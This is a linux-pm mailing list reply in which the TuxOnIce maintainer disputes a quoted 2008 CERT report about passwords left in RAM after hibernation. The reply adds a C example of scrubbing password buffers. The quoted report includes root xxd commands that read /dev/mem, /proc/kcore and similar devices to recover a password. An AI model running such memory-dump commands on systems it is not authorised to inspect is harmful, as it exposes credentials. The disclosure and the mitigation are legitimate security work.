Re: Vulnerability in Software Suspend 2 (all versions)

Hi.

This is not a bug in TuxOnIce (or for that matter other Linux
hibernation implementations, which would have the same issue).

TuxOnIce has no way to know what running applications have passwords
stored in memory or whether they are storing them in an encrypted format
or not. Bugs should be filed against applications that are storing
passwords in plain text.

By the way, these contact email addresses are grossly out of date. For
TuxOnIce, the contact is nigel@xxxxxxxxxxxxx. For swsusp and uswsusp
(which would have the same problem), refer to linux-pm@xxxxxxxxxxxxxxx

Regards,

Nigel

On Mon, 2008-07-28 at 14:03 +0530, Jonathan Brossard wrote:
> 
> Version 1.0
> October 1996
>             CERT(R) Coordination Center
>         Product Vulnerability Reporting Form
> 
>     If you know of a vulnerability in a product, please complete
>     this form and return it to cert@xxxxxxxxx  We aren't able to
>     acknowledge each report we receive; however, if we have additional
>     questions, we will contact you for further information.
> 
>         We prefer that any vulnerability information you
>           send to us be encrypted. We can support a shared DES
>       key or PGP. Contact the CERT staff for more information.
>       The CERT PGP public key is available in
> 
>                  http://www.cert.org/pgp/cert_pgp_key.asc
> 
>     Thanks, we appreciate your taking the time to report this
>     vulnerability.
> 
> 
> 
> 
> CONTACT INFORMATION
> ===============================================================================
> Let us know who you are:
> 
>  Name            : Jonathan Brossard
>  E-mail            : jonathan@xxxxxxxxxxxxx
>  Phone / fax        : +91-33-23242212
>  Affiliation and address: iViZ Technosolutions Pvt. Ltd., Kolkata, 
> India. http://www.ivizindia.com
> 
> 
> Have you reported this to the vendor?  [yes]
> 
>         If so, please let us know whom you've contacted:
> 
>     Date of your report    : Mon Jul 28 13:57:44 IST 2008
>     Vendor contact name    :
>     Vendor contact phone    :
>     Vendor contact e-mail    : bernardb@xxxxxxxxxxxxxxxxxxxxx 
> chabaud@xxxxxxxxxxxxxxxxxxxxx ncunningham@xxxxxxxxxxxxxxxxxxxxx
>     Vendor reference number    :
> 
> 
>         If not, we encourage you to do so--vendors need to hear about
>     vulnerabilities from you as a customer.
> 
> 
> POLICY INFO
> ===============================================================================
> We encourage communication between vendors and their customers.  When
> we forward a report to the vendor, we include the reporter's name and
> contact information unless you let us know otherwise.
> 
> If you want this report to remain anonymous, please check here:
> 
>     ___ Do not release my identity to your vendor contact.
> 
> 
> TECHNICAL INFO
> ===============================================================================
> If there is a CERT Vulnerability tracking number please put it
> here (otherwise leave blank): VU#______.
> 
> 
> Please describe the vulnerability.
> - ----------------------------------
> 
> The Linux kernel patch "Tux on ice" (previously called "software suspend 2")
> fails to sanitize the memory area where user input,
> in particular passwords are read. Therefore, the passwords remain in
> plain text in RAM, after successful restoration of the hibernated machine's
> state.
> 
> 
> What is the impact of this vulnerability?
> - -----------------------------------------
>  (For example: local user can gain root/privileged access, intruders
>   can create root-owned files, denial of service attack,  etc.)
> 
>    a) What is the specific impact:
> 
> Plain text password disclosure of the authentication password.
> 
>    b) How would you envision it being used in an attack scenario:
> 
> The attacker can use this password to reboot the computer, possibly
> to gain more privileges.
> 
> To your knowledge is the vulnerability currently being exploited?
> - -----------------------------------------------------------------
>     [no]
> 
> If there is an exploitation script available, please include it here.
> - ---------------------------------------------------------------------
> 
> Just pick up one (trivial) exploit below :
> 
> root@blackbox:~# xxd -l 32 -s 0x041e  /dev/mem
> 000041e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
> 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
> root@blackbox:~# xxd -l 32 -s 0x41e /dev/oldmem
> 000041e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
> 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
> root@blackbox:~# xxd -l 32 -s 0x041e /dev/.static/dev/mem
> 000041e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
> 000042e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
> root@blackbox:~# xxd -l 32 -s 0x141e  /proc/kcore
> 000141e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
> 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
> root@blackbox:~# xxd -l 32 -s 0x141e /dev/core
> 000141e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
> 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
> root@blackbox:~# xxd -l 32 -s 0x141e /dev/.static/dev/core
> 000141e: 7019 3405 731f 731f 7711 300b 7213 6420  p.4.s.s.w.0.r.d
> 000142e: 0d1c 0d1c 0000 0000 0000 0000 0000 0000  ................
> root@blackbox:~#
> 
> 
> 
> Do you know what systems and/or configurations are vulnerable?
> - --------------------------------------------------------------
>     [yes/no]  (If yes, please list them below)
> 
>     All versions.
> 
> 
> Are you aware of any workarounds and/or fixes for this vulnerability?
> - ---------------------------------------------------------------------
>     [yes]
> 
> I provided a kernel patch to the owners of the project.
> 
> OTHER INFORMATION
> ===========================================================================
> Is there anything else you would like to tell us?
> 
>  You can indeed get back to us if you need more details :)
> 
> 
> - --------
> CERT and CERT Coordination Center are registered in the U.S. Patent and 
> Trademark office.
> 

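The point Nigel makes above, that the fix belongs in applications that keep a password in plain text in memory rather than in the hibernation code, comes down to scrubbing the buffer as soon as the secret has been consumed. The following C program is an added illustration written for this page; it is not code from TuxOnIce, from the reporter's patch, or from any project named in the thread. The password value, the `demo_consume` stand-in for a real password consumer, and the buffer sizes are all constructed for the example.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Zero a buffer through a volatile pointer so the compiler cannot drop the
   stores as "dead" (a plain memset() immediately before return or free()
   frequently is optimised away, leaving the secret in RAM). */
void secure_zero(void *buf, size_t len)
{
    volatile unsigned char *p = (volatile unsigned char *)buf;
    while (len--)
        *p++ = 0;
}

/* Return 1 if every byte of buf is zero, 0 otherwise. Used here to verify
   that a secret really has been scrubbed. */
int is_scrubbed(const unsigned char *buf, size_t len)
{
    unsigned char acc = 0;
    for (size_t i = 0; i < len; i++)
        acc |= buf[i];
    return acc == 0;
}

/* Stand-in (hypothetical) for whatever consumes the secret: PAM, a KDF, a
   network login. It only returns the password length; what matters for the
   example is what happens to the buffer afterwards. */
static size_t demo_consume(const char *pw)
{
    return strlen(pw);
}

/* Hand the password to the consumer, then scrub the whole buffer. Scrubbing
   the full capacity rather than strlen(pw) bytes also removes the terminator
   and any stale tail bytes from an earlier, longer entry. */
size_t use_and_scrub(char *pw, size_t cap)
{
    size_t r = demo_consume(pw);
    secure_zero(pw, cap);
    return r;
}

/* Constructed scenario: an application copies a typed password into a
   buffer, uses it, scrubs it. Returns 1 if no trace of it remains. */
int demo_scrubbed(void)
{
    char pw[64];
    strcpy(pw, "p4ssw0rd");   /* constructed sample value, not a real credential */
    use_and_scrub(pw, sizeof pw);
    return is_scrubbed((const unsigned char *)pw, sizeof pw);
}

/* Same scenario without the scrub: the secret stays in the buffer, which is
   exactly what a full-RAM snapshot such as a hibernation image captures.
   Returns 1 if a trace remains. */
int demo_leaked(void)
{
    char pw[64] = {0};
    strcpy(pw, "p4ssw0rd");   /* constructed sample value */
    demo_consume(pw);
    return !is_scrubbed((const unsigned char *)pw, sizeof pw);
}

int main(void)
{
    printf("scrubbed copy leaves no trace:   %s\n", demo_scrubbed() ? "yes" : "no");
    printf("unscrubbed copy leaves a trace:  %s\n", demo_leaked() ? "yes" : "no");
    return 0;
}
```

Where the platform provides one, a library primitive with the same guarantee (`explicit_bzero` on glibc and the BSDs, `memset_s` from C11 Annex K) is preferable to a hand-rolled loop. Note also what this does not cover: `mlock()` keeps a page out of swap but does nothing against a hibernation image, which is a snapshot of all of RAM, so keeping the lifetime of the plaintext short and scrubbing it promptly is the mitigation that actually applies to the scenario in the report.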
_______________________________________________
linux-pm mailing list
linux-pm@xxxxxxxxxxxxxxxxxxxxxxxxxx
https://lists.linux-foundation.org/mailman/listinfo/linux-pm
